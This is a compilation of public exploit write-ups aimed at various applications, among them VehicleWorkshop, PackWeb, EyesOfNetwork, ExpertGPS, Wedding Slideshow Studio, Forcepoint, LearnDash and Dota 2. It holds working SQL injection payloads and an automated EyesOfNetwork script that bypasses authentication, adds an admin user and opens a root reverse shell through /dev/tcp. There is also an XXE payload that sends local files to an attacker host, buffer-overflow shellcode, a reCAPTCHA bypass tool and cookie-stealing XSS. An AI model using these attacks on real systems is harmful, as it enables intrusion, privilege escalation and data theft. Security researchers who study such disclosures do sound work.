ISHACK AI BOT

# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection # Data: 2020-02-06 # Exploit Author: Mehran Feizi # Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop # Tested on: Windows # Google Dork: N/A ========= Vulnerable Page: ========= /viewtestdrive.php ========== Vulnerable Source: ========== Line6: if(isset($_GET['testid'])) Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'"); Line11: if(isset($_GET['testbid'])) Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'"); Line16: if(isset($_GET['testbida'])) Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'"); ========= POC: ========= http://site.com/viewtestdrive.php?bookingid=[SQL]

# Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection # Google Dork: intitle: "PackWeb Formap E-learning" # Date: 2020-02-07 # Exploit Author: Amel BOUZIANE-LEBLOND # Vendor Homepage: https://www.ediser.com/ # Software Link: https://www.ediser.com/98517-formation-en-ligne # Version: v1.0 # Tested on: Linux # CVE : N/A # Description: # The PackWeb Formap E-learning application from EDISER is vulnerable to # SQL injection via the 'NumCours' parameter on the eleve_cours.php ==================== 1. SQLi ==================== http://localhost/eleve_cours.php?NumCours=[SQLI] The 'NumCours' parameter is vulnerable to SQL injection. GET parameter 'NumCours' is vulnerable. --- Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SLEEP) Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1 Type: UNION query Title: MySQL UNION query (47) - 1 column Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1 --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12

# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution # Date: 2020-02-01 # Exploit Author: Clément Billac # Vendor Homepage: https://www.eyesofnetwork.com/ # Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso # Version: 5.3 # CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656 #!/bin/env python3 # coding: utf8 # # # CVE-2020-8654 - Discovery module to allows to run arbitrary OS commands # We were able to run the 'id' command with the following payload in the target field : ';id #'. # # CVE-2020-8655 - LPE via nmap NSE script # As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script. # nmap version 6.40 is used and doesn't have the -c and -e options. # # CVE-2020-8656 - SQLi in API in getApiKey function on 'username' field # PoC: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or ' # Auth bypass: /eonapi/getApiKey?&username=' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '&password=h4knet # Python imports import sys, requests, json, os, argparse, socket from bs4 import BeautifulSoup # Text colors txt_yellow = "\033[01;33m" txt_blue = "\033[01;34m" txt_red = "\033[01;31m" txt_green = "\033[01;32m" txt_bold = "\033[01;01m" txt_reset = "\033[00m" txt_info = txt_blue + "[*] " + txt_reset txt_success = txt_green + "[+] " + txt_reset txt_warn = txt_yellow + "[!] " + txt_reset txt_err = txt_red + "[x] " + txt_reset # Banner banner = (txt_bold + """ +-----------------------------------------------------------------------------+ | EyesOfNetwork 5.3 RCE (API v2.4.2) | | 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m | | | | Examples: | | eonrce.py -h | | eonrce.py http(s)://EyesOfNetwork-URL | | eonrce.py https://eon.thinc.local -ip 10.11.0.182 -port 3128 | | eonrce.py https://eon.thinc.local -ip 10.11.0.182 -user pentest2020 | +-----------------------------------------------------------------------------+ """ + txt_reset) # Arguments Parser parser = argparse.ArgumentParser("eonrce", formatter_class=argparse.RawDescriptionHelpFormatter, usage=banner) parser.add_argument("URL", metavar="URL", help="URL of the EyesOfNetwork server") parser.add_argument("-ip", metavar="IP", help="Local IP to receive reverse shell", default=socket.gethostbyname(socket.gethostname())) parser.add_argument("-port", metavar="Port", type=int, help="Local port to listen", default=443) parser.add_argument("-user", metavar="Username", type=str, help="Name of the new user to create", default='h4ker') parser.add_argument("-password", metavar="Password", type=str, help="Password of the new user", default='net_was_here') args = parser.parse_args() # HTTP Requests config requests.packages.urllib3.disable_warnings() baseurl = sys.argv[1].strip('/') url = baseurl useragent = 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37' # Admin user creation variables new_user = args.user new_pass = args.password # Executed command # The following payload performs both the LPE and the reverse shell in a single command. # It creates a NSE script in /tmp/h4k wich execute /bin/sh with reverse shell and then perform the nmap scan on localhost with the created NSE script. # Readable PoC: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k # ip = args.ip port = str(args.port) cmd = '%3Becho+%22local+os+%3D+require+%5C%22os%5C%22+hostrule%3Dfunction%28host%29+os.execute%28%5C%22%2Fbin%2Fsh+-i+%3E%26+%2Fdev%2Ftcp%2F' + ip + '%2F' + port + '+0%3E%261%5C%22%29+end+action%3Dfunction%28%29+end%22+%3E+%2Ftmp%2Fh4k%3Bsudo+%2Fusr%2Fbin%2Fnmap+localhost+-p+1337+-script+%2Ftmp%2Fh4k+%23' # Exploit banner print (txt_bold,"""+-----------------------------------------------------------------------------+ | EyesOfNetwork 5.3 RCE (API v2.4.2) | | 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m | +-----------------------------------------------------------------------------+ """, txt_reset, sep = '') # Check if it's a EyesOfNetwork login page. r = requests.get(baseurl, verify=False, headers={'user-agent':useragent}) if r.status_code == 200 and r.text.find('<title>EyesOfNetwork</title>') != -1 and r.text.find('form action="login.php" method="POST">') != -1: print(txt_info, "EyesOfNetwork login page found", sep = '') else: print(txt_err, 'EyesOfNetwork login page not found', sep = '') quit() # Check for accessible EON API url = baseurl + '/eonapi/getApiKey' r = requests.get(url, verify=False, headers={'user-agent':useragent}) if r.status_code == 401 and 'api_version' in r.json().keys() and 'http_code' in r.json().keys(): print(txt_info, 'EyesOfNetwork API page found. API version: ',txt_bold , r.json()['api_version'], txt_reset, sep = '') else: print(txt_warn, 'EyesOfNetwork API page not found', sep = '') quit() # SQL injection with authentication bypass url = baseurl + '/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet' r = requests.get(url, verify=False, headers={'user-agent':useragent}) if r.status_code == 200 and 'EONAPI_KEY' in r.json().keys(): print(txt_success, 'Admin user key obtained: ', txt_bold, r.json()['EONAPI_KEY'], txt_reset, sep = '') else: print(txt_err, 'The host seems patched or unexploitable', sep = '') print(txt_warn, 'Did you specified http instead of https in the URL ?', sep = '') print(txt_warn, 'You can check manually the SQLi with the following payload: ', txt_bold, "/eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '", txt_reset, sep = '') quit() # Adding new administrator url = sys.argv[1].strip('/') + '/eonapi/createEonUser?username=admin&apiKey=' + r.json()['EONAPI_KEY'] r = requests.post(url, verify=False, headers={'user-agent':useragent}, json={"user_name":new_user,"user_group":"admins","user_password":new_pass}) if r.status_code == 200 and 'result' in r.json().keys(): if r.json()['result']['code'] == 0 and 'SUCCESS' in r.json()['result']['description']: id = r.json()['result']['description'].split('ID = ', 1)[1].split(']')[0] print(txt_success, 'New user ', txt_bold, new_user, txt_reset, ' successfully created. ID:', txt_bold, id, txt_reset, sep = '') elif r.json()['result']['code'] == 1: if ' already exist.' in r.json()['result']['description']: print(txt_warn, 'The user ', txt_bold, new_user, txt_reset, ' already exists', sep = '') else: print(txt_err, 'An error occured while querying the API. Unexpected description message: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '') quit() else: print(txt_err, 'An error occured while querying the API. Unepected result code. Description: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '') quit() else: print(txt_err, 'An error occured while querying the API. Missing result value in JSON response or unexpected HTTP status response', sep = '') quit() # Authentication with our new user url = baseurl + '/login.php' auth_data = 'login=' + new_user + '&mdp=' +new_pass auth_req = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, data=auth_data) if auth_req.status_code == 200 and 'Set-Cookie' in auth_req.headers: print(txt_success, 'Successfully authenticated', sep = '') else: print(txt_err, 'Error while authenticating. We expect to receive Set-Cookie headers uppon successful authentication', sep = '') quit() # Creating Discovery job url = baseurl + '/lilac/autodiscovery.php' job_command = 'request=autodiscover&job_name=Internal+discovery&job_description=Internal+EON+discovery+procedure.&nmap_binary=%2Fusr%2Fbin%2Fnmap&default_template=&target%5B2%5D=' + cmd r = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, cookies=auth_req.cookies, data=job_command) if r.status_code == 200 and r.text.find('Starting...') != -1: job_id = str(BeautifulSoup(r.content, "html.parser").find(id="completemsg")).split('?id=', 1)[1].split('&rev')[0] print(txt_success, 'Discovery job successfully created with ID: ', txt_bold, job_id, txt_reset, sep = '') else: print(txt_err, 'Error while creating the discovery job', sep = '') quit() # Launching listener print(txt_info, 'Spawning netcat listener:', txt_bold) nc_command = '/usr/bin/nc -lnvp' + port + ' -s ' + ip os.system(nc_command) print(txt_reset) # Removing job url = baseurl + '/lilac/autodiscovery.php?id=' + job_id + '&delete=1' r = requests.get(url, verify=False, headers={'user-agent':useragent}, cookies=auth_req.cookies) if r.status_code == 200 and r.text.find('Removed Job') != -1: print(txt_info, 'Job ', job_id, ' removed', sep = '') else: print(txt_err, 'Error while removing the job', sep = '') quit()

# Exploit Title: Google Invisible RECAPTCHA 3 - Spoof Bypass # Date: 2020-02-07 # Vendor Homepage: https://developers.google.com/recaptcha/docs/invisible # Exploit Git Repo: https://github.com/matamorphosis/Browser-Exploits/tree/master/RECAPTCHA_Bypass # Exploit Author: Matamorphosis # Tested on: Windows and Ubuntu 19.10 # Category: Web Apps -------------------------------------------------------------------------------------------- RECAPTCHA Bypass: -------------------------------------------------------------------------------------------- This tool allows a user to bypass Version 3 of Google's Invisible RECAPTCHA by creating a spoofed web app that leverages the same RECAPTCHA, by providing the victims site key. What makes a site vulnerable? 1. They are using Version 3 of Google's Invisible RECAPTCHA 2. They allow the site key to be used on "localhost". However, while currently untested you could try adding the DNS name of the target you are attacking and try resolving it to 127.0.0.1 in your hosts file. NOTE: Exploit users need to have a functional understanding of both Python and JavaScript to make the necessary changes to run this exploit. -------------------------------------------------------------------------------------------- PREREQUISITES: -------------------------------------------------------------------------------------------- The instructions supplied are written for Debian-based Linux distributions. However, this can be setup on any OS with relative ease. 1. Download and install Firefox located at https://www.mozilla.org/en-US/firefox/new/ 2. Download Gecko Driver located at https://github.com/mozilla/geckodriver/releases and ensure the binary is in your path. For *nux just copy the file to /usr/bin ``` user@linux:~$ sudo cp geckodriver /usr/bin/geckodriver ``` 3. To use this exploit, you need to install python3, pip3 and install the additional requirements that are in the requirements.txt file. ``` user@linux:~$ sudo apt install python3 python3-pip -y ``` 4. Now install the prerequisistes ``` user@linux:~$ pip3 install -r requirements.txt ``` -------------------------------------------------------------------------------------------- USAGE: -------------------------------------------------------------------------------------------- 1. Obtain the site key from the target web application. There should be JavaScript that looks like the following - use the inspect element function to view it, there are two locations you can grab the site key: ``` <script src="https://www.google.com/recaptcha/api.js?render=<SITE-KEY-HERE>"></script> <script> grecaptcha.ready(function() { grecaptcha.execute('<SITE-KEY-HERE>', {action:'validate_captcha'}) .then(function(token) { // add token value to form document.getElementById('g-recaptcha-response').value = token; }); }); </script> ``` 2. Open the index.html file and paste the Site Key into the appropriate locations. 3. This next part is where it gets a little tricky. You need to replicate the form you are attacking and change a few things. Firstly in the body of the index.html file. Ensure you are using the appropriate method "GET" or "POST" and you are submitting it to the correct destination. ``` <body> <form id="form_id" method="<METHOD GOES HERE>" action="<VICTIM FORM SUBMISSION LINK>" <input type="hidden" id="g-recaptcha-response" name="captcha"> <input id="accName" type="text" name="accountName" value=""> <input id="uName" type="text" name="username" value=""> <input type="submit" value="Submit"> </form> </body> ``` *For steps 4-6, example code has been provided already, but ensure it matches the site you are targetting. It may be easier to strip it out and follow 4-6 if you are having a difficult time getting it working.* 4. Next you will need to add the following lines to the body of the JavaScript already inside of the <script> tags in the head of the html, after the last line. ``` var url_string = window.location.href; var url = new URL(url_string); ``` 5. After this you need to add the following lines **for each** visible <input> tag in the form you are attacking. This code will automatically take what parameters are provided to the page and set the input elements accordingly. ``` var paramValue1 = url.searchParams.get("accountName"); var account = document.getElementById("accName"); account.value = paramValue1; ``` 6. Lastly, add the following lines after you have added JavaScript for each of the <input> tags: ``` var frm = document.getElementById("form_id"); frm.submit(); ``` 7. Now you need to edit the enumerate.py file to suit your needs. First ensure you change the function to suit the parameters required by your index.html file. In the below example I am trying to enumerate usernames, for an accountname that is the same everytime. Note: You must use "localhost" or a DNS name, using "127.0.0.1" or another IP address will probably not work. ``` accountName = 'testAccount' def attempt(user): driver = webdriver.Firefox() driver.get(f'http://localhost:8000?accountName={accountName}&username={user}') ``` 8. Everytime the above function is called, a new Firefox window will be opened, and the link will be called. *If you wish to try and get this working in a headless mode and you succeed, kindly contribute your changes to this repository* This will allow for the JavaScript to be executed to get the needed CAPTCHA which will automatically be forwarded onto the destination. After this create a threaded for loop to suit your needs that iterates through a list, that calls the above function for each attempt: ``` for user in ['user1', 'user2', 'user3']: thread = threading.Thread(target=attempt, args=(user,)) thread.start() ``` 9. You are now ready to run the exploit, in one terminal session start the web server. This will run on localhost on TCP port 8000. You can change these settings by editing the http_serve.py file: ``` user@linux:~$ python3 http_serve.py ``` 10. In another terminal session, run the enumerate.py script, and watch it run! ``` user@linux:~$ python3 enumerate.py ``` -------------------------------------------------------------------------------------------- FILES: -------------------------------------------------------------------------------------------- ---- http_serve.py ---- -------------------------------------------------------------------------------------------- #!/usr/bin/python3 import http.server import socketserver PORT = 8000 Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("localhost", PORT), Handler) print("serving at port", PORT) httpd.serve_forever() -------------------------------------------------------------------------------------------- ---- enumerate.py ---- -------------------------------------------------------------------------------------------- #!/usr/bin/python3 from selenium import webdriver from selenium.common.exceptions import TimeoutException from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By import threading accountName = 'foobar' def attempt(user): driver = webdriver.Firefox() driver.get(f'http://localhost:8000?accountName={accountName}&username={user}') for user in ['user1', 'user2', 'user3']: thread = threading.Thread(target=attempt, args=(user,)) thread.start() -------------------------------------------------------------------------------------------- ---- index.html ---- -------------------------------------------------------------------------------------------- <!DOCTYPE html> <head> <script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/releases/TYDIjJAqCk6g335bFk3AjlC3/recaptcha__en.js"></script> <script src="https://www.google.com/recaptcha/api.js?render=<SITE_KEY_GOES_HERE>"></script> <script> grecaptcha.ready(function() { // do request for recaptcha token // response is promise with passed token grecaptcha.execute('<SITE_KEY_GOES_HERE>', {action:'validate_captcha'}) .then(function(token) { // add token value to form document.getElementById('g-recaptcha-response').value = token; var url_string = window.location.href; var url = new URL(url_string); var paramValue1 = url.searchParams.get("accountName"); var account = document.getElementById("accName"); account.value = paramValue1; var paramValue2 = url.searchParams.get("username"); var uname = document.getElementById("uName"); uname.value = paramValue2; var frm = document.getElementById("form_id"); frm.submit(); }); }); </script> </head> <body> <form id="form_id" method="<METHOD>" action="<VICTIM FORM SUBMISSION LINK>"> <input type="hidden" id="g-recaptcha-response" name="captcha"> <input id="accName" type="text" name="accountName" value=""> <input id="uName" type="text" name="username" value=""> <input type="submit" value="Submit"> </form> </body> </html>

[+] Exploit Title: ExpertGPS 6.38 - XML External Entity Injection [+] Date: 2019-12-07 [+] Exploit Author: Trent Gordon [+] Vendor Homepage: https://www.topografix.com/ [+] Software Link: http://download.expertgps.com/SetupExpertGPS.exe [+] Disclosed at: 7FEB2020 [+] Version: 6.38 [+] Tested on: Windows 10 [+] CVE: N/A ================== Background: ================== ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellin, etc.) and organize GPS waypoint data. One of the main file formats for saving GPS data is the .gpx format which is based on XML. ================== Vulnerability: ================== By having a user import a crafted .gpx file (XML Based GPS data file), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker. 1.)Open ExpertGPS.exe 2.)Select File -> Import Data from Other Programs... 3.)Select the crafted route.gpx file (with listener open on ATTACKERS-IP) and click "Open". ================== Proof of Concept: ================== a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd) b.) Hosted "payload.dtd" <?xml version="1.0" encoding="utf-8" ?> <!ENTITY % data SYSTEM "file:///c:/windows/system.ini"> <!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKERS-IP?%data;'>"> c.) Exploited "route.xml" <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd"> %sp; %param1; %exfil; ]> <gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="ExpertGPS 6.38 using Garmin Colorado 400t" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wptx1="http://www.garmin.com/xmlschemas/WaypointExtension/v1" xmlns:gpxx="http://www.garmin.com/xmlschemas/GpxExtensions/v3" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd http://www.topografix.com/GPX/gpx_overlay/0/3 http://www.topografix.com/GPX/gpx_overlay/0/3/gpx_overlay.xsd http://www.topografix.com/GPX/gpx_modified/0/1 http://www.topografix.com/GPX/gpx_modified/0/1/gpx_modified.xsd http://www.topografix.com/GPX/Private/TopoGrafix/0/4 http://www.topografix.com/GPX/Private/TopoGrafix/0/4/topografix.xsd http://www.garmin.com/xmlschemas/WaypointExtension/v1 http://www8.garmin.com/xmlschemas/WaypointExtensionv1.xsd http://www.garmin.com/xmlschemas/GpxExtensions/v3 http://www.garmin.com/xmlschemas/GpxExtensionsv3.xsd"> <metadata> <bounds minlat="38.89767500" minlon="-77.03654700" maxlat="38.89767500" maxlon="-77.03654700"/> <extensions> <time xmlns="http://www.topografix.com/GPX/gpx_modified/0/1">2019-12-08T03:35:44.731Z</time> <active_point xmlns="http://www.topografix.com/GPX/Private/TopoGrafix/0/4" lat="38.89767500" lon="-77.03654700"> </active_point> </extensions> </metadata> <wpt lat="38.89767500" lon="-77.03654700"> <time>2019-12-08T03:35:44.732Z</time> <name>1600PennsylvaniaAvenuenWashingt</name> <cmt>1600 Pennsylvania Avenue Washington</cmt> <desc>1600 Pennsylvania Avenue Washington, DC 20500</desc> <sym>City (Small)</sym> <type>Address</type> <extensions> <label xmlns="http://www.topografix.com/GPX/gpx_overlay/0/3"> <label_text>1600 Pennsylvania Avenue Washington, DC 20500</label_text> </label> <gpxx:WaypointExtension> <gpxx:Address> <gpxx:StreetAddress>1600 Pennsylvania Avenue</gpxx:StreetAddress> <gpxx:City>Washington</gpxx:City> <gpxx:State>DC</gpxx:State> <gpxx:Country>United States</gpxx:Country> <gpxx:PostalCode>20500</gpxx:PostalCode> </gpxx:Address> </gpxx:WaypointExtension> <wptx1:WaypointExtension> <wptx1:Address> <wptx1:StreetAddress>1600 Pennsylvania Avenue</wptx1:StreetAddress> <wptx1:City>Washington</wptx1:City> <wptx1:State>DC</wptx1:State> <wptx1:Country>United States</wptx1:Country> <wptx1:PostalCode>20500</wptx1:PostalCode> </wptx1:Address> </wptx1:WaypointExtension> </extensions> </wpt> <extensions> </extensions> </gpx> ================== Additional Attack Vectors: ================== There are numerous places in the software that allow for importing/opening a .gpx file. I did not test them all, but I strongly suspect them to all rely upon the same misconfigured XML Parser, and therefore be vulnerable to XXE.

#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-09 #Vendor Homepage : http://www.wedding-slideshow-studio.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "poc.txt". #2. Just copy the text inside "poc.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "poc.txt" into the field: "Registration Key" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 1608 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10023b8a) #0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("poc.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting # Exploit Author: Prasenjit Kanti Paul # Vendor Homepage: https://www.forcepoint.com/ # Software Link: https://www.forcepoint.com/product/cloud-security/web-security # Version: Forcepoint Web Security 8.5 # Tested on: Windows 7,10 and Linux Mint # CVE : CVE-2019-6146 # ForcePoint KBA: https://support.forcepoint.com/KBArticle?id=000017702 # Video PoC: https://youtu.be/NfXGaNVK6eE # Description: User must visit any site which is restricted as per # forcepoint policy. So that forcepoint web security will show a generic # page. While parsing "Domain Name" within generic page forcepoint is not # validating Host header, which caused XSS. Lets assume, while accessing anysite.com, forcepoint web security prevents us to go to that website with its custom exception/blocking page. Now follow the steps below: *Steps*: 1. Intercept the traffic while accessing https://anysite.com 2. Modify the Host header from anysite.com to "> <script>alert("evilsite")</script> *Timeline:* - Oct. 21, 2019 - Issue Reported to PSIRT team of ForcePoint - Oct. 23, 2019 - ForcePoint team confirms the issue - Oct. 24, 2019 - CVE-2019-6146 has been assigned - Jan. 23, 2020 - ForcePoint KBA has been published with proper fixes *Regards,* *Prasenjit Kanti Paul*

# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting # Date: 2020-01-14 # Vendor Homepage: https://www.learndash.com # Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312 # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 3.0.0 - 3.1.1 # CVE : CVE-2020-7108 1. Description LearnDash is one of the most popular and easiest to use WordPress LMS plugins in the market. It allows users to easily create courses and sell them online and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected. 2. Proof of Concept Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload. [wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions. GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1 Host: learndashtesting.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://learndashtesting.com/my-account-2/ Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685 3. Timeline Vulnerability reported to the LearnDash team – January 14, 2020 LearnDash version 3.1.2 containing the fix released – January 14, 2020

# Exploit Title: Dota 2 7.23f - Denial of Service (PoC) # Google Dork: N/A # Date: 2020-02-05 # Exploit Author: Bogdan Kurinnoy ([email protected]) (bi7s) # Vendor Homepage: https://www.valvesoftware.com/en/ # Software Link: N/A # Version: 7.23f # Tested on: Windows 10 (x64) # CVE : CVE-2020-7949 Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is mishandled during a GetValue call. Attacker need invite a victim to play on attacker game server using specially crafted map or create custom game, then when initialize the game of the victim, the specially crafted map will be automatically downloaded and processed by the victim, which will lead to the possibility to exploit vulnerability. Also attacker can create custom map and upload it to Steam <https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>. Steps for reproduce: 1. Copy attached file zuff.vpk ( https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to map directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\dota\maps) 2. Launch Dota2 3. Launch "zuff" map from Dota2 game console. Command for game console = map zuff 4. Dota2 is crash (Access Violation) Debug information: (2098.1634): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win64\schemasystem.dll - (2098.1634): Access violation - code c0000005 (!!! second chance !!!) rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6 rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000 rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000 r8=00000000412ee51c r9=000000e82bcfea88 r10=0000027b5ffb9774 r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0 r14=0000027b5ffb5328 r15=0000000000000010 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200 schemasystem!BinaryProperties_GetValue+0x10ae: 00007ffa`73af90ce 40383b cmp byte ptr [rbx],dil ds:0000027b`a23dd9b6=??

